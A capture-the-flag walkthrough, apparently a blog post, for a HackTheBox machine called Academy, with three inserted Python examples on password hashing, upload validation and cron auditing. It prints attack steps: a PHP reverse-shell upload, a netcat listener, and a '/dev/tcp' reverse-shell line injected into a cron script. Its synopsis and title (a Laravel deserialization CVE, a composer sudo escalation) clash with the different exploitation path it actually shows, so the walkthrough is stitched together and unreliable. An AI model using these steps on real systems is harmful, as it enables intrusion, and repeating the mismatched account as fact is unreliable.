In this post, we demonstrated Laravel PHP CVE-2018-15133 and conducted privilege escalation by finding stored credentials. This video was part of HackTheBox Academy.


HackTheBox Academy Machine Synopsis

Academy is an easy difficulty Linux machine that features an Apache server hosting a PHP website. The website is found to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we are able to modify the Role ID, which allows us to access an admin portal. This reveals a vhost that is found to be running on Laravel. Laravel debug mode is enabled, and the exposed API key together with the vulnerable version of Laravel allow us to carry out a deserialization attack that results in Remote Code Execution. Examination of the Laravel `.env` file for another application reveals a password that is found to work for the `cry0l1t3` user, who is a member of the `adm` group. This allows us to read system logs, and the TTY input audit logs reveal the password for the `mrb3n` user. `mrb3n` has been granted permission to execute composer as root using `sudo`, which we can leverage in order to escalate our privileges.

Information Gathering and Scanning with Nmap

With nmap, we can scan the machine with the command below:

nmap -p- -T4 <Target_IP> -A -sV -oN nmap.txt

Open ports found:

  • 21 FTP
  • 22 SSH
  • 80 HTTP

Services Enumeration

FTP

FTP allows anonymous access, and a note containing a password hash was found on the server:

[Screenshot: note retrieved from the FTP server]

Web Server Enumeration with Gobuster

We used the below command to enumerate directories and files:

gobuster dir -u http://<Target_IP>/ -w <Wordlist_Path>

Directories found:

  • /phpmyadmin
  • /academy

Hash cracking with Crackstation

With the note we got from the FTP server, we can paste the hash into CrackStation and get the plaintext password:

[Screenshot: CrackStation result]

Then you can use the password to log in to the /academy page, where you will be prompted to change the password.
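The reason the hash in the note was recoverable is that it was a bare, unsalted, fast hash: one lookup table serves every user of every site that stores passwords this way. The added example below (not part of the original post; the wordlist and hashes are constructed here) shows the lookup that a CrackStation-style service performs, and the salted, iterated storage format (PBKDF2 via Python's standard library) against which that same lookup fails.

```python
# Added example: why an unsalted fast hash is a table lookup away from the
# password, and what storage format resists it. Wordlist and hashes are
# constructed for this illustration, not taken from the machine.
import hashlib
import hmac
import os
from typing import Optional, Sequence

# Constructed stand-in for the word lists behind lookup services.
COMMON_PASSWORDS = ["123456", "password", "letmein", "qwerty", "Welcome1", "sunshine"]


def unsalted_lookup(hex_digest: str, wordlist: Sequence[str] = COMMON_PASSWORDS) -> Optional[str]:
    """Reverse a bare MD5 / SHA-1 / SHA-256 digest by hashing each candidate.

    The digest length identifies the algorithm. With no salt, every
    candidate needs hashing only once, ever, for all users and all sites.
    """
    algo = {32: "md5", 40: "sha1", 64: "sha256"}.get(len(hex_digest))
    if algo is None:
        return None
    target = hex_digest.lower()
    for candidate in wordlist:
        if hashlib.new(algo, candidate.encode()).hexdigest() == target:
            return candidate
    return None


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Store as pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>.

    A per-user random salt makes a precomputed table useless, and the
    iteration count makes each guess cost the attacker as much as it costs
    the server.
    """
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    leaked = hashlib.md5(b"Welcome1").hexdigest()  # constructed: the kind of value the note held
    print("unsalted md5 lookup  ->", unsalted_lookup(leaked))
    stored = hash_password("Welcome1")
    print("pbkdf2 digest lookup ->", unsalted_lookup(stored.split("$")[-1]))
    print("verify_password      ->", verify_password("Welcome1", stored))
```

Running the script shows the MD5 value resolving immediately while the PBKDF2 digest, even when fed to the same lookup, resolves to nothing; only `verify_password` with the stored salt can confirm a guess, one expensive computation at a time.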

Initial foothold using file upload vulnerability and PHP reverse shell

After logging in to the /academy page, navigate to the MY PROFILE page and you will see a “student registration” page showing your profile information. On this page there is an option to upload a student photo. This is where we will upload a PHP reverse shell.

Make sure to start a netcat listener based on the port found in the PHP reverse shell:

nc -lvp 4444

With the listener running, we can upload the PHP reverse shell and navigate to /academy/studentphoto/ to locate the file and verify that it was uploaded successfully.

Once you click on the file name, you will receive the connection on your listener.
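The foothold works because the photo upload keeps whatever name and content the client sends and stores it under the web root, where Apache executes `.php` files. The added example below (not code from the original post or from the target application; file names and contents are constructed) contrasts that weak acceptance rule with the checks an image upload field needs: an extension allowlist with exactly one extension, a magic-byte check on the body, a size cap, and a server-generated file name.

```python
# Added example: the acceptance rule behind the foothold beside a hardened
# one. Names and file bodies are constructed for this illustration.
import os
import secrets
from typing import Optional, Tuple

# Magic bytes for the only types a "student photo" field should accept.
IMAGE_SIGNATURES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024


def vulnerable_accept(filename: str) -> bool:
    """The weak pattern: trust the client-supplied name (and MIME type) and
    keep the file as-is under the web root. Anything with an extension passes,
    a .php file included, and the web server will then execute it."""
    return "." in filename


def hardened_accept(filename: str, content: bytes) -> Tuple[bool, Optional[str], str]:
    """Return (accepted, name_to_store, reason).

    The stored name is generated server-side, so nothing the client chose
    reaches the filesystem or the URL space. The saved file should also live
    outside the document root (or in a directory with script execution off)
    so that even a mis-validated file is served as data, never executed.
    """
    base = os.path.basename(filename.replace("\\", "/"))   # drop any path component
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, None, "exactly one extension required (rejects photo.php.jpg)"
    ext = parts[1]
    if ext not in IMAGE_SIGNATURES:
        return False, None, f"extension .{ext} not in allowlist"
    if len(content) > MAX_BYTES:
        return False, None, "file too large"
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        return False, None, "content does not match declared image type"
    stored = f"{secrets.token_hex(16)}.{ext}"
    return True, stored, "ok"


if __name__ == "__main__":
    samples = [
        ("shell.php", b"<?php echo 1; ?>"),
        ("photo.php.jpg", b"\xff\xd8\xff\xe0"),
        ("photo.jpg", b"<?php echo 1; ?>"),
        ("../../photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, body in samples:
        print(f"{name:18} weak={vulnerable_accept(name)!s:5} hardened={hardened_accept(name, body)}")
```

Note that the magic-byte check is necessary but not sufficient on its own: a file can carry a valid image header and still contain PHP further in, which is why the stored name must not keep a client-chosen extension and why the upload directory must not execute scripts.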

Linux privilege escalation and exploitation

First, we upgrade to a fully interactive TTY shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Under the web server directory, namely /var/www/html/academy/includes, we find a config.php file containing MySQL credentials. These credentials do not work on the database, but they do work for SSH, so log in over SSH with the credentials you found:

ssh grimmie@academy.htb

Under the home directory /home/grimmie/ there is a Bash script named backup.sh.

Open the file in the nano text editor, comment out all of its lines, and add the line below to establish a reverse shell:

/bin/sh -i >& /dev/tcp/<Attacker_IP>/<PORT> 0>&1

If you have a listener set up on the port you chose, you should receive the connection within a minute or two.
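The escalation works because a script that runs on a schedule with elevated privileges is editable by a low-privileged user, so whatever that user writes into it runs with the scheduler's privileges. The added example below (not from the original post; the crontab lines and files are constructed) is a small audit that pulls the command paths out of system-crontab style entries and flags scripts, or their parent directories, that someone other than a trusted account could modify.

```python
# Added example: audit scheduled scripts for the weakness used above, a
# privileged cron entry pointing at a script a low-privileged user can edit.
# Crontab content and files are constructed for this illustration.
import os
import stat
import tempfile
from typing import Collection, Dict, List


def command_paths(crontab_text: str) -> List[str]:
    """Extract the executable from /etc/crontab style lines:
    five time fields, a user, then the command."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue  # not a system-crontab entry
        paths.append(fields[6])
    return paths


def audit_script(path: str, trusted_uids: Collection[int] = (0,)) -> List[str]:
    """Return findings for one scheduled script (empty list means clean)."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing (if the parent is writable, anyone can create it)"]
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    if st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable")
    if st.st_uid not in trusted_uids:
        findings.append(f"{path}: owned by uid {st.st_uid}, not a trusted account")
    parent = os.path.dirname(path) or "."
    pmode = os.stat(parent).st_mode
    # A writable parent without the sticky bit lets the script be replaced wholesale.
    if pmode & (stat.S_IWOTH | stat.S_IWGRP) and not pmode & stat.S_ISVTX:
        findings.append(f"{parent}: directory writable by others (script can be replaced)")
    return findings


def audit_crontab(crontab_text: str, trusted_uids: Collection[int] = (0,)) -> Dict[str, List[str]]:
    return {p: audit_script(p, trusted_uids) for p in command_paths(crontab_text)}


def demo() -> Dict[str, List[str]]:
    """Build a throwaway fixture mirroring the machine: a root cron entry for a
    script living in a user's home directory that the user can write to, beside
    a correctly permissioned one."""
    tmp = tempfile.mkdtemp()
    weak = os.path.join(tmp, "backup.sh")
    clean = os.path.join(tmp, "rotate-logs.sh")
    for p in (weak, clean):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho backup\n")
    os.chmod(weak, 0o777)
    os.chmod(clean, 0o755)
    crontab = f"# m h dom mon dow user command\n*/1 * * * * root {weak}\n0 3 * * * root {clean}\n"
    # The fixture is owned by whoever runs this, so treat that uid as trusted.
    return audit_crontab(crontab, trusted_uids={os.getuid()})


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, "->", findings or "clean")
```

On a real host the same functions can be pointed at `/etc/crontab` and the files under `/etc/cron.d` with the default trusted uid of root; any finding is a script whose content is controlled by someone other than the account it runs as.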

Check out the video below for detailed explanation.

[Embedded video: HackTheBox Academy Walkthrough]

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.